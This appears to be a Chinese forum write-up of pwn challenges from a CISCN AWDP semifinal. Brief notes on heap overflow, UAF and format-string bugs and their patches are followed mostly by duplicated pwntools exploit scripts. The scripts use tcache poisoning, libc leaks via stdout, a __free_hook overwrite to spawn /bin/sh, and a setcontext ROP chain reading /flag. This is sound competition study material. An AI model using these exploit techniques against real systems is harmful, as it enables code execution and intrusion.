-
-
[原创]CCB_CISCN_半决赛-AWDP-Pwn
-
发表于: 3天前
-
第十八届全国大学生信息安全竞赛(创新实践能力赛)暨第二届“长城杯”铁人三项赛(防护赛)半决赛 AWDP-pwn题题解
没有show, 构造堆块 ub 和 tcache fd重叠, 后面1/16 概率,申请到 _IO_2_1_stdout_-0x10
成功的情况下
最终脚本
错误的传参,存在格式字符串漏洞 ,这里也会导致堆溢出
把原本的 snprintf 函数 nop 掉即可
protobuf,堆溢出漏洞
堆块大小改大
free 后,指针还是存在的 应该存在UAF 漏洞
clear() 后 仍然可以对堆块操作,修改链表即可 任意地址申请
把 申请的堆块大小固定成一个 大的size
不看
idx 改小
from pwn import *
#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))
attack = '10.10.1.113 28142'.replace(' ',':')
binary = './pwn'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(log_level = 'debug')context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
elf = ELF(binary)
#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''
brva 0x001698brva 0x01754 #continue'''.format(**locals())
#import os#os.systimport os#io = remote(*attack.split(':'))def add(idx,size):
ru('>> ')
sl('1')
ru(':')
sl(str(idx))
ru(': ')
sl(str(size))
def rm(idx):
ru('>> ')
sl('2')
ru(':')
sl(str(idx))
def edit(idx,size,text):
ru('>> ')
sl('3')
ru(':')
sl(str(idx))
ru(': ')
sl(str(size))
ru(': ')
s(text)
for i in range(100):
io = start([])
add(0,0x80)
add(1,0xF0)
add(2,0xF0)
add(3,0xF0)
add(4,0xF0)
add(5,0xF0)
add(6,0xe0)
add(7,0xe0)
ru('>> ')
sl('3')
ru(':')
sl('0')
ru(': ')
pay = b'A'* 0x90
pay += p64(0xFFFF)
s(pay)
ru(': ')
s('TEST')
pay = b'\x00' * 0xF0
pay += p64(0x100*4+0xF1)
edit(1,0x200,pay)
rm(4)
rm(3)
rm(2)
stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF
lss('stdout')
add(2,0x70)
add(3,0x70)
try:
pay = b'\x00' * 0x1f8
pay += p16(stdout + 0x2000)
edit(1,len(pay), pay)
add(8,0xF0)
add(9,0xF0)
pay = p64(0)
pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0)
edit(9,len(pay), pay)
io.recvuntil('\x00'*8)
libc_base = uu64(r(8)) - 2017664
libc.address = libc_base
free_hook = libc.sym['__free_hook']
lss('libc_base')
pause()
rm(7)
rm(6)
pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10)
edit(1,len(pay), pay)
add(6,0xe0)
add(7,0xe0)
edit(7,0x40,p64(0)+p64(libc.sym['system']))
pay = 0xF8 * '/' + '/bin/sh\x00'
edit(1,len(pay), pay)
rm(2)
#gdb.attach(io,gdbscript=gdbscript)
io.interactive()
except:
io.close()
pass
itr()from pwn import *
#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))
attack = '10.10.1.113 28142'.replace(' ',':')
binary = './pwn'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(log_level = 'debug')context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
elf = ELF(binary)
#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''
brva 0x001698brva 0x01754 #continue'''.format(**locals())
#import os#os.systimport os#io = remote(*attack.split(':'))def add(idx,size):
ru('>> ')
sl('1')
ru(':')
sl(str(idx))
ru(': ')
sl(str(size))
def rm(idx):
ru('>> ')
sl('2')
ru(':')
sl(str(idx))
def edit(idx,size,text):
ru('>> ')
sl('3')
ru(':')
sl(str(idx))
ru(': ')
sl(str(size))
ru(': ')
s(text)
for i in range(100):
io = start([])
add(0,0x80)
add(1,0xF0)
add(2,0xF0)
add(3,0xF0)
add(4,0xF0)
add(5,0xF0)
add(6,0xe0)
add(7,0xe0)
ru('>> ')
sl('3')
ru(':')
sl('0')
ru(': ')
pay = b'A'* 0x90
pay += p64(0xFFFF)
s(pay)
ru(': ')
s('TEST')
pay = b'\x00' * 0xF0
pay += p64(0x100*4+0xF1)
edit(1,0x200,pay)
rm(4)
rm(3)
rm(2)
stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF
lss('stdout')
add(2,0x70)
add(3,0x70)
try:
pay = b'\x00' * 0x1f8
pay += p16(stdout + 0x2000)
edit(1,len(pay), pay)
add(8,0xF0)
add(9,0xF0)
pay = p64(0)
pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0)
edit(9,len(pay), pay)
io.recvuntil('\x00'*8)
libc_base = uu64(r(8)) - 2017664
libc.address = libc_base
free_hook = libc.sym['__free_hook']
lss('libc_base')
pause()
rm(7)
rm(6)
pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10)
edit(1,len(pay), pay)
add(6,0xe0)
add(7,0xe0)
edit(7,0x40,p64(0)+p64(libc.sym['system']))
pay = 0xF8 * '/' + '/bin/sh\x00'
edit(1,len(pay), pay)
rm(2)
#gdb.attach(io,gdbscript=gdbscript)
io.interactive()
except:
io.close()
pass
itr()syntax = "proto3";
package mypackage;message pwn2 { int32 option = 1;
int32 chunk_sizes = 2;
int32 heap_chunks_id = 3;
bytes heap_content = 4;
}// protoc --python_out=. pwn2.protosyntax = "proto3";
package mypackage;message pwn2 { int32 option = 1;
int32 chunk_sizes = 2;
int32 heap_chunks_id = 3;
bytes heap_content = 4;
}// protoc --python_out=. pwn2.protofrom pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))
attack = ''.replace(' ',':')
binary = './pwn'
def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(log_level = 'debug')context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc#elf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''
brva 0x1DECbrva 0x01BD6#continue'''.format(**locals())
#import os#os.systimport os#io = remote(*attack.split(':'))io = start([])import pwn2_pb2# syntax = "proto3";# package mypackage;# message pwn2 {# int32 option = 1;# int32 chunk_sizes = 2;# int32 heap_chunks_id = 3;# bytes heap_content = 4;# }def add(size,text=b'123',idx=0):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 1;
data.chunk_sizes = size
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
def rm(idx,size=0,text=b'123'):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 2;
data.chunk_sizes = size
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
def edit(idx,size=0,text=b'123'):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 3;
data.chunk_sizes = size
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
def show(idx,size=0,text=b'123'):
ru('Your prompt >> ')
data = pwn2_pb2.pwn2()
data.option = 4;
data.chunk_sizes = 1
data.heap_chunks_id = idx
data.heap_content = text
raw = data.SerializeToString()
print(hexdump(raw))
pay = p32(len(raw)) + raw
s(pay)
# 这里的堆块基本都是连续在一起的,后续溢出就方便很多add(0x100, b'1')
add(0x100, b'2')
add(0x100, b'3')
add(0x100, b'4')
add(0x100, b'5')
add(0x100, b'6')
add(0x100, b'7')
add(0x100, b'8')
pay = b'A' * 0x108 + p64(0x110 * 4 +1)
edit(1,len(pay),pay)rm(2)add(0x100, b'8')
show(3)ru(': ')
libc_base = uu64(r(6)) - 2169632libc.address = libc_baselss('libc_base')
add(0x100, b'8')
rm(8)show(3)ru(': ')
key = uu64(r(5))heap_base = key << 0xCrm(2)pay = b'A' * 0x108 + p64(0x111)
pay += p64(key ^ libc.sym['_IO_2_1_stdout_'])
edit(1,len(pay),pay)add(0x100, b'7')
# 模板orw 嗦fake_IO_addr = libc.sym['_IO_2_1_stdout_']
pay = flat({ 0x00: ' sh;',
0x18: libc.sym['setcontext'] + 61,
0x20: fake_IO_addr, # 0x20 > 0x18
0x68: fake_IO_addr, # rdi #read fd
0x70: 0, # rsi #read buf
0x78: fake_IO_addr, # rsi2 #read buf
0x88: fake_IO_addr + 0x8, # rdx #read size
0x90: 0x400, # rdx2 #read size
0x98: 0x23, # rdx #read size
0xa0: fake_IO_addr,
0xa8: libc.sym['setcontext'] + 294, # RCE2 ogg
0xb0: libc.sym['read'], # RCE2 ogg
0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
0xe0: fake_IO_addr,
},filler=b'\x00')
gdb.attach(io,gdbscript)add(0x100, pay)pause()libc.address = libc_baselibc_rop = ROP(libc)rax = libc_rop.find_gadget(['pop rax','ret'])[0]
rdi = libc_rop.find_gadget(['pop rdi','ret'])[0]
rsi = libc_rop.find_gadget(['pop rsi','ret'])[0]
m = 0try:
rdx = libc_rop.find_gadget(['pop rdx','ret'])[0];m = 1
except: rdx = libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]; m = 2
syscall = libc_rop.find_gadget(['syscall','ret'])[0]
orw_rop_addr = fake_IO_addr # ret to addrbuf = orw_rop_addr + 0xa0 + m*3*8orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(buf) + p64(rsi) + p64(0) + p64(rdx) + p64(0)*m + p64(syscall)orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['read'])
orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['write'])
orw_rop += b'/flag'.ljust(0x10,b'\x00')
sl(orw_rop)lss('libc_base')
lss('key')
lss('heap_base')
#pay = flat({#},filler=b'\x00')# libc.address = libc_base# system = libc.sym['system']# bin_sh = next(libc.search(b'/bin/sh'))itr()from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))
attack = ''.replace(' ',':')
binary = './pwn'
def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(log_level = 'debug')context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc#elf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''
brva 0x1DECbrva 0x01BD6#continue'''.format(**locals())
#import os#os.systimport os#io = remote(*attack.split(':'))io = start([])import pwn2_pb2# syntax = "proto3";# package mypackage;# message pwn2 {# int32 option = 1;# int32 chunk_sizes = 2;# int32 heap_chunks_id = 3;# bytes heap_content = 4;# }def add(size,text=b'123',idx=0):
ru('Your prompt >> ')
[招生]科锐逆向工程师培训(2025年3月11日实地,远程教学同时开班, 第52期)!
|
|
|---|---|
